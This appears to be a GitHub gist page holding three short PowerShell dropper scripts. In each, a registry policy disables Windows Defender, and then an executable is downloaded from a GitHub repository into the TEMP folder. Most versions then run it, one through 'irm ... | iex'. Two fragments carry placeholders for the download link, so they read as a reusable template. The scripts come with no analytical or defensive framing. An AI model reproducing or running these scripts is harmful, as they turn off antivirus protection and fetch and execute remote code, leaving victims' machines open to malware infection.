This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value 1 -Type DWord | |
| $url = "https://github.com/Lvv2/ff/raw/refs/heads/main/ff.exe" | |
| $output = "$env:TEMP\ff.exe" | |
| Invoke-WebRequest -Uri $url -OutFile $output | |
| $url = "https://gist.githubusercontent.com/Lvv2/48aeccba59779446997664eade8ad38e/raw/6e9cac46a354d6c81bf05f44d9349b62a93b2b14/gistfile1.txt" | |
| $output = "$env:TEMP\ff.txt" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t "REG_DWORD" /d "1" /f | |
| $url = "Link Address (GIT HUB)" | |
| $output = "$env:TEMP\Name.exe" | |
| Invoke-WebRequest -Uri $url -OutFile $output | |
| Start-Process -FilePath $output -Wait | |
| powershell "irm https://github.com/Lvv2/ff/raw/refs/heads/main/ff.exe| iex" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t "REG_DWORD" /d "1" /f | |
| $url = "Link Address (GIT HUB)" | |
| $output = "$env:TEMP\Name.exe" | |
| Invoke-WebRequest -Uri $url -OutFile $output | |
| Start-Process -FilePath $output -Wait |